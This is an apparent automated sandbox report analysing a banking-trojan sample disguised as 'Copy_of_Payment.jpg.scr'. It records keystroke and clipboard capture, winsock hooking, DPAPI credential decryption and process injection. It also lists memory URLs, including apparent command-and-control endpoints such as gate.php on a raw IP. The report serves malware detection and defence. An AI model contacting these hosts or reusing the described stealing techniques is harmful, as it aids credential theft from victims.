Analysis Report

Overview

General Information

Analysis ID:	90048
Start time:	10:50:17
Start date:	13/11/2015
Overall analysis duration:	0h 3m 45s
Report type:	light
Sample file name:	Copy_of_Payment.jpg.scr
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 (Office 2003 SP1, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 41, Firefox 36)
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	1
Number of existing processes analysed:	1
Number of existing drivers analysed:	0
Number of injected processes analysed:	4
Technologies	HCA enabled EGA enabled
HCA Informations:	Success: true, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
EGA Information:	Success: true, ratio: 100%
Cookbook Comments:	Found application associated with file extension: .scr
Warnings:	Show All Exclude process from analysis (whitelisted): mscorsvw.exe, spsys.sys, WmiPrvSE.exe, sppsvc.exe, conhost.exe, dllhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi) for: Copy_of_Payment.jpg.scr, ubhiy.exe

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	100	0 - 100	Report FP / FN

Analysis Advice

Sample has functionality to log and monitor keystrokes, analyze it with the keystroke simulation cookbook

Sample hooks winsock APIs (likely related to a banking trojan), analyze sample with the e-bank browsing cookbook

Sample monitors Window changes (e.g. starting applications), analyze the sample with the simulation cookbook

Uses HTTPS for network communication, use the SSL MITM Proxy cookbook for further analysis

Signature Overview

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Show sources

Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_2_0041CB49 CryptUnprotectData,LocalFree,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_2_0042D6C9 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_1_0041CB49 CryptUnprotectData,LocalFree,
Source: C:\Copy_of_Payment.jpg.scr	Code function: 1_1_0042D6C9 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_003DCB49 CryptUnprotectData,LocalFree,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_003ED6C9 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_0041CB49 CryptUnprotectData,LocalFree,
Source: C:\Users\admin\AppData\Roaming\Sywayc\ubhiy.exe	Code function: 3_2_0042D6C9 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_0023D6C9 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\System32\dwm.exe	Code function: 4_2_0022CB49 CryptUnprotectData,LocalFree,
Source: C:\Program Files\Windows Mail\WinMail.exe	Code function: 7_2_0487D6C9 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Program Files\Windows Mail\WinMail.exe	Code function: 7_2_0486CB49 CryptUnprotectData,LocalFree,
Source: C:\Windows\explorer.exe	Code function: 8_2_029CD6C9 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\explorer.exe	Code function: 8_2_029BCB49 CryptUnprotectData,LocalFree,
Source: C:\Windows\System32\taskhost.exe	Code function: 10_2_01A6D6C9 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\System32\taskhost.exe	Code function: 10_2_01A5CB49 CryptUnprotectData,LocalFree,
Source: C:\Windows\System32\cmd.exe	Code function: 12_2_0005D6C9 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\System32\cmd.exe	Code function: 12_2_0004CB49 CryptUnprotectData,LocalFree,
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_001CD6C9 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_001BCB49 CryptUnprotectData,LocalFree,
Source: C:\Windows\System32\HOSTNAME.EXE	Code function: 18_2_0005D6C9 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\System32\HOSTNAME.EXE	Code function: 18_2_0004CB49 CryptUnprotectData,LocalFree,
Source: C:\Windows\System32\tasklist.exe	Code function: 19_2_0005D6C9 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\System32\tasklist.exe	Code function: 19_2_0004CB49 CryptUnprotectData,LocalFree,
Source: C:\Windows\System32\ipconfig.exe	Code function: 20_2_0005D6C9 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\System32\ipconfig.exe	Code function: 20_2_0004CB49 CryptUnprotectData,LocalFree,
Source: C:\Windows\System32\netsh.exe	Code function: 21_2_0016D6C9 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Windows\System32\netsh.exe	Code function: 21_2_0015CB49 CryptUnprotectData,LocalFree,

Protection of GUI:

Contains functionality to create a new desktop

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Code function: 1_2_0040F42E OpenDesktopW,CreateDesktopW,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityInfo,LocalFree,

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read the clipboard data

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Code function: 1_2_004183AE GetClipboardData,GlobalLock,EnterCriticalSection,LeaveCriticalSection,GlobalUnlock,

Contains functionality to retrieve information about pressed keystrokes

Show sources

Source: C:\Copy_of_Payment.jpg.scr

Code function: 1_2_004181FF EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,TranslateMessage,

Hooks clipboard functions (used to sniff clipboard data)

Show sources

Source: explorer.exe

IAT, EAT or inline hook detected: module: USER32.dll function: GetClipboardData

E-Banking Fraud:

Drops certificate files (DER)

Show sources

Source: C:\Windows\explorer.exe	File created: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\828298824EA5549947C17DDABF6871F5_D1BCEE7E304F0D5FB8AA811D9B2D0835
Source: C:\Windows\explorer.exe	File created: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\23B523C9E7746F715D33C6527C18EB9D
Source: C:\Windows\explorer.exe	File created: C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8059E9A0D314877E40FE93D8CCFB3C69_391A6F2A32C9E501D499B1154C59BAF3

Hooks winsocket function (used for sniffing or altering network traffic)

Show sources

Source: explorer.exe

File created: function: send

Networking:

Urls found in memory or binary data

Show sources

Source: explorer.exe	String found in binary or memory: file:///c:/program%20files/autoit3/autoit3.exe
Source: explorer.exe	String found in binary or memory: file:///c:/program%20files/autoit3/autoit3.exe(
Source: explorer.exe	String found in binary or memory: file:///c:/program%20files/autoit3/autoit3.exe=
Source: explorer.exe	String found in binary or memory: file:///c:/program%20files/common%20files/adobe/arm/1.0/adobearm.exe
Source: explorer.exe	String found in binary or memory: file:///c:/program%20files/common%20files/adobe/arm/1.0/adobearm.exe06
Source: explorer.exe	String found in binary or memory: file:///c:/program%20files/google/chrome/application/44.0.2403.125/installer/chrmstp.exe
Source: explorer.exe	String found in binary or memory: file:///c:/users/admin/appdata/local/microsoft/windows/wer/erc/responsestatecache.xml
Source: explorer.exe	String found in binary or memory: file:///c:/users/admin/appdata/local/microsoft/windows/wer/erc/responsestatecache.xml1
Source: explorer.exe	String found in binary or memory: file://c:
Source: explorer.exe, taskhost.exe, cmd.exe, conhost.exe, HOSTNAME.EXE, tasklist.exe, ipconfig.exe, netsh.exe	String found in binary or memory: http://
Source: ubhiy.exe, dwm.exe, WinMail.exe, explorer.exe, taskhost.exe, cmd.exe, conhost.exe, HOSTNAME.EXE, tasklist.exe, ipconfig.exe, netsh.exe	String found in binary or memory: http://%02x%02x%02x%02x%02x%02x%02x%02x.com/%02x%02x%02x%02x/%02x%02x%02x%02x.php
Source: ubhiy.exe, dwm.exe, WinMail.exe, explorer.exe, taskhost.exe, cmd.exe, conhost.exe, HOSTNAME.EXE, tasklist.exe, ipconfig.exe, netsh.exe	String found in binary or memory: http://%02x%02x%02x%02x%02x%02x%02x%02x.com/%02x%02x%02x%02x/%02x%02x%02x%02x.phpfilefilewww.
Source: taskhost.exe	String found in binary or memory: http://167.114.109.203/service/omoba/helps/file.php
Source: explorer.exe	String found in binary or memory: http://167.114.109.203/service/omoba/helps/file.php$n
Source: taskhost.exe	String found in binary or memory: http://167.114.109.203/service/omoba/helps/file.phpr7
Source: explorer.exe	String found in binary or memory: http://167.114.109.203/service/omoba/helps/gate.php
Source: explorer.exe	String found in binary or memory: http://167.114.109.203/service/omoba/helps/gate.php2n
Source: taskhost.exe	String found in binary or memory: http://1715500327.log.optimizely.com/event?a=1715500327&d=301363282&y=false&src=js&s1708060746=ie&s1
Source: taskhost.exe	String found in binary or memory: http://ads1.msads.net/cae/iafscreens/js/iafplugin.js
Source: taskhost.exe	String found in binary or memory: http://ads1.msads.net/library/8.3/dapmsn.js
Source: taskhost.exe	String found in binary or memory: http://ads1.msads.net/library/8.4/dapmsn.js
Source: taskhost.exe	String found in binary or memory: http://ajax.aspnetcdn.com/ajax/jquery/jquery-1.10.2.min.js
Source: taskhost.exe	String found in binary or memory: http://ajax.aspnetcdn.com/ajax/jquery/jquery-1.8.3.min.js
Source: taskhost.exe	String found in binary or memory: http://bamideas.piwikpro.com/piwik.js
Source: WinMail.exe	String found in binary or memory: http://c
Source: taskhost.exe	String found in binary or memory: http://c.s-microsoft.com/en-us/cmsimages/4300ae64-546c-4bbe-9026-6779b3684fb8_32.png?version=fab1a31
Source: taskhost.exe	String found in binary or memory: http://c.s-microsoft.com/en-us/cmsimages/bing-search-logo.png?version=b9a1d5d0-cfa3-c63f-f172-8a21f4
Source: taskhost.exe	String found in binary or memory: http://c.s-microsoft.com/en-us/cmsimages/bing.png?version=51f5f4b2-5b74-2fa3-a073-d0f84a1a5269
Source: taskhost.exe	String found in binary or memory: http://c.s-microsoft.com/en-us/cmsimages/click-run-arrow.png?version=41f8dce3-aca3-89a1-8f17-9e09f48
Source: taskhost.exe	String found in binary or memory: http://c.s-microsoft.com/en-us/cmsimages/click-run-grad.png?version=2909b4da-a145-975c-1454-698cdaf0
Source: taskhost.exe	String found in binary or memory: http://c.s-microsoft.com/en-us/cmsimages/ie.png?version=467680b6-593d-08ad-ce96-067c387d2798
Source: taskhost.exe	String found in binary or memory: http://c.s-microsoft.com/en-us/cmsimages/logo-microsoft.png?version=029a39d2-6e4c-3bad-e511-33411f56
Source: taskhost.exe	String found in binary or memory: http://c.s-microsoft.com/en-us/cmsimages/search_icon.png?version=7cc024ed-166d-af7e-d0bf-e85b2a5d5c6
Source: taskhost.exe	String found in binary or memory: http://c.s-microsoft.com/en-us/cmsimages/windowsupdate.png?version=25325311-c620-0626-19b4-db991d6a3
Source: taskhost.exe	String found in binary or memory: http://c.s-microsoft.com/en-us/cmsimages/yellow-arrow.png?version=1d2c1b0b-3610-e22f-a3b7-8c35b768d3
Source: taskhost.exe	String found in binary or memory: http://c.s-microsoft.com/en-us/cmsscripts/script.jsx?k=281fcd14-7a19-5bc8-92ea-05c4bb32bbec_684431b9
Source: taskhost.exe	String found in binary or memory: http://c.s-microsoft.com/en-us/cmsscripts/script.jsx?k=40b42b5f-e87d-23b8-7dc9-9b9a7e3cf449
Source: taskhost.exe	String found in binary or memory: http://c.s-microsoft.com/en-us/cmsstyles/style.csx?k=eb892833-0e5a-b8c0-2921-57013ef132d9_899796fc-1
Source: taskhost.exe	String found in binary or memory: http://cdn.adnxs.com/anx_async_usersync.js
Source: taskhost.exe	String found in binary or memory: http://cdn.adnxs.com/msft/containertag.js?tag_id=3262834&domain=pixel.alephd.com&switch=on&height=90
Source: taskhost.exe	String found in binary or memory: http://cdn.flashtalking.com/40938/79865_mbvd_streetart_970x250_bb_f8.swf
Source: taskhost.exe	String found in binary or memory: http://cdn.flashtalking.com/40938/79865_mbvd_streetart_970x250_video_player.swf
Source: taskhost.exe	String found in binary or memory: http://cdn.flashtalking.com/40938/clasb_pk_orangeart_streetart_30sec_noloop_iab_bb_970x250.swf
Source: taskhost.exe	String found in binary or memory: http://cdn.flashtalking.com/oba/icon/iconc.png?edaa_icon=y
Source: taskhost.exe	String found in binary or memory: http://cdn.flashtalking.com/pagefold/ftpagefold_v3.0.19.js
Source: taskhost.exe	String found in binary or memory: http://cdn.flashtalking.com/xre/113/1138130/958305/js/j-1138130-958305.js
Source: taskhost.exe	String found in binary or memory: http://cdn.flashtalking.com/xre/113/1138130/958305/swf/clasb_pk_orangeart-streetart-noloop-30sec-bas
Source: taskhost.exe	String found in binary or memory: http://cdn.optimizely.com/js/1715500327.js
Source: explorer.exe, 8059E9A0D314877E40FE93D8CCFB3C69_391A6F2A32C9E501D499B1154C59BAF3.1236.dr	String found in binary or memory: http://clients1.google.com/ocsp/mekwrzbfmemwqtajbgurdgmcgguabbty4gr5hyodjxcbsrkjeqm1gih%2bzaqust0gfh
Source: explorer.exe	String found in binary or memory: http://clients1.google.com/ocsp0
Source: explorer.exe	String found in binary or memory: http://clients1.google.com/ocsphttp://pki.google.com/giag2.crld.com
Source: taskhost.exe	String found in binary or memory: http://connect.facebook.net/de_de/all.js
Source: taskhost.exe	String found in binary or memory: http://connect.facebook.net/de_de/sdk.js
Source: WinMail.exe	String found in binary or memory: http://crl.comod
Source: WinMail.exe	String found in binary or memory: http://crl.comodo.net/
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://crl.comodo.net/utn-userfirst-hardware.crl0q
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://crl.comodoca.com/utn-userfirst-hardware.crl06
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: 23B523C9E7746F715D33C6527C18EB9D.1236.dr	String found in binary or memory: http://crl.geotrust.com/crls/secureca.crl
Source: explorer.exe	String found in binary or memory: http://crl.geotrust.com/crls/secureca.crl0n
Source: explorer.exe	String found in binary or memory: http://crl.geotrust.com/crls/secureca.crlq
Source: WinMail.exe, ppcrlui_3580_2.3580.dr	String found in binary or memory: http://crl.microsoft.com/pki/crl/products/codesignpca.crl0
Source: WinMail.exe	String found in binary or memory: http://crl.microsoft.com/pki/crl/products/codesignpca.crlwj
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://crl.microsoft.com/pki/crl/products/miccerlisca2011_2011-03-29.crl0
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://crl.microsoft.com/pki/crl/products/miccertrulispca_2009-04-02.crl0
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://crl.microsoft.com/pki/crl/products/microoceraut_2010-06-23.crl0z
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0t
Source: WinMail.exe	String found in binary or memory: http://crl.microsoft.com/pki/crl/products/msnidentityservicespca.crl0j
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://crl.pkioverheid.nl/domorganisatielatestcrl-g2.crl0
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://crl.pkioverheid.nl/domovlatestcrl.crl0
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://crl.usertrust.com/utn-userfirst-object.crl0)
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://crl.verisign.com/pca3.crl0
Source: ppcrlui_3580_2.3580.dr	String found in binary or memory: http://crl.verisign.com/thawtetimestampingca.crl0
Source: WinMail.exe, ppcrlui_3580_2.3580.dr	String found in binary or memory: http://crl.verisign.com/tss-ca.crl0
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://crt.comodoca.com/utnaddtrustserverca.crt0$
Source: WinMail.exe	String found in binary or memory: http://cs
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: taskhost.exe	String found in binary or memory: http://de.ioam.de/tx.io?st=msn&cp=pr-homepage&sv=i2&pt=cp&rf=&r2=&ur=www.msn.com&xy=800x600x24&lo=de
Source: taskhost.exe	String found in binary or memory: http://dnn506yrbagrg.cloudfront.net/pages/scripts/0016/9608.js?396516
Source: taskhost.exe	String found in binary or memory: http://dnn506yrbagrg.cloudfront.net/pages/scripts/0016/9608.js?396517
Source: dwm.exe, WinMail.exe	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: taskhost.exe	String found in binary or memory: http://dps.bing.com/ai/api/v1/userrest.svc/provider/542e32ac-eb2a-4a0d-a430-fcb3debdbd25/user/nil/se
Source: explorer.exe	String found in binary or memory: http://g.symcb.com/crls/gtglobal.crl0
Source: explorer.exe, 828298824EA5549947C17DDABF6871F5_D1BCEE7E304F0D5FB8AA811D9B2D0835.1236.dr	String found in binary or memory: http://g.symcd.com/meqwqjbamd4wpdajbgurdgmcgguabbsxtdkxkba3l3lqeffgudsipnvt7gquapkqw0grtsncud5v8scxe
Source: explorer.exe	String found in binary or memory: http://g.symcd.com0
Source: explorer.exe	String found in binary or memory: http://g.symcd.comhttp://g.symcb.com/crls/gtglobal.crl14
Source: netsh.exe	String found in binary or memory: http://go.microsoft.com/fwlink/?linkid=1214
Source: explorer.exe, netsh.exe	String found in binary or memory: http://go.microsoft.com/fwlink/?linkid=121488
Source: WinMail.exe, explorer.exe	String found in binary or memory: http://go.microsoft.com/fwlink/?linkid=125824-http://go.microsoft.com/fwlink/?linkid=125723-http://g
Source: taskhost.exe	String found in binary or memory: http://go.microsoft.com/fwlink/?linkid=299201
Source: explorer.exe	String found in binary or memory: http://go.microsoft.com/fwlink/?linkid=3448&clcid=%#04lx
Source: 0B4F5A6C-00000001.eml.3580.dr	String found in binary or memory: http://go.microsoft.com/fwlink/?linkid=3d51301
Source: WinMail.exe	String found in binary or memory: http://go.microsoft.com/fwlink/?linkid=51301
Source: WinMail.exe	String found in binary or memory: http://go.microsoft.com/fwlink/?linkid=55108
Source: taskhost.exe	String found in binary or memory: http://go.microsoft.com/fwlink/?linkid=69157
Source: netsh.exe	String found in binary or memory: http://go.microsoft.com/fwlink/?linkid=92362.
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa3e1pt.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa3e1pt?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa3e3xc.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa3e3xc?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa42ckd.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa42ckd?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa42hvg.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa42hvg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa42hvs.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa42hvs?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa42ysf.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa42ysf?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa54rqj.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa54rqj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa6jpt3.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa6jpt3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa8gdem.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa8gdem?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa8tave.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa8tave?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa9jd9s.img?h=72&w=112&m=6&q=60&u=t&o=t&l=f&x=686&y=1346
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa9jd9s?h=72&w=112&m=6&q=60&u=t&o=t&l=f&x=686&y=1346
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa9l2sa.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=803&y=4
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa9l2sa?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=803&y=467
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa9xejq.img?h=72&w=112&m=6&q=60&u=t&o=t&l=f&x=580&y=447
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aa9xejq?h=72&w=112&m=6&q=60&u=t&o=t&l=f&x=580&y=447
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa2djj.img?h=194&w=300&m=6&q=60&u=t&o=t&l=f
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa2djj?h=194&w=300&m=6&q=60&u=t&o=t&l=f
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa3dep.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1127&y
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa3dep?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1127&y=518
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa3fex.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=712&y=1
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa3fex?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=712&y=189
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa43ew.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=632&y=1
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa43ew?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=632&y=147
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa48av.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa48av?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4ben.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=958&y=4
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4ben?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=958&y=430
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4cps.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4cps?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4cy8.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4cy8?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4eas.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=508&y=2
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4eas?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=508&y=221
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4gli.img?h=194&w=300&m=6&q=60&u=t&o=t&l=f&x=1668&y=635
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4gli?h=194&w=300&m=6&q=60&u=t&o=t&l=f&x=1668&y=635
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4i3f.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4i3f?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4kjh.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg&x=347&y=
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4kjh?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg&x=347&y=274
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4pfm.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4pfm?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4qlc.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=457&y=1
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4qlc?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=457&y=159
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4qwm.img?h=194&w=300&m=6&q=60&u=t&o=t&l=f
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4qwm?h=194&w=300&m=6&q=60&u=t&o=t&l=f
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4rbh.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4rbh?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4teu.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4teu?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: taskhost.exe	String found in binary or memory: http://img.s-msn.com/tenant/amp/entityid/aaa4ttp.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1374&y
